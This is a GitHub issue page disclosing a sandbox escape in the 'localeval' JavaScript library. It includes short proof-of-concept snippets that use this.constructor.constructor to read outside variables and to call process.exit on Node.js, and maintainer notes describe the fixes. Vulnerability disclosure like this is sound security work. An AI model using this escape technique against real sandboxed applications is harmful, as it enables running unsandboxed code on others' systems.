You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
On both Node.js and the browser the sandbox can be trivially broken, i.e. one can access variables outside the sandbox and execute non-sandboxed code.
Proof of concept for variable access:
varle=require("localeval");varhiddenVariable=123;// It shouldn't be accessible from inside the sandbox, right?console.log(le("this.constructor.constructor('return hiddenVariable')()"));// Prints "123"
Proof of concept for code execution on Node.js:
varle=require("localeval");le("this.constructor.constructor('process.exit(0)')()");console.log("This is never executed.");
Proof of concept for code execution on the browser:
We were calling the function with
fn.apply(0, ...)
which caused the `this` object to be a number,
leaking the Number prototype into the environment
and allowing access to outside variables.
We instead now use an object with no prototype.
It incidentally tackles part of #9 in the browser context.
This protects from a vulnerability related to #9.
Ensuring the code runs in a process with no rights,
ensure that any vulnerability cannot get undue access,
thanks to OS-level protections.
It is a strong safety guarantee.
On both Node.js and the browser the sandbox can be trivially broken, i.e. one can access variables outside the sandbox and execute non-sandboxed code.
Proof of concept for variable access:
Proof of concept for code execution on Node.js:
Proof of concept for code execution on the browser:
Credit to
vm2
for exposing this attack method.The text was updated successfully, but these errors were encountered: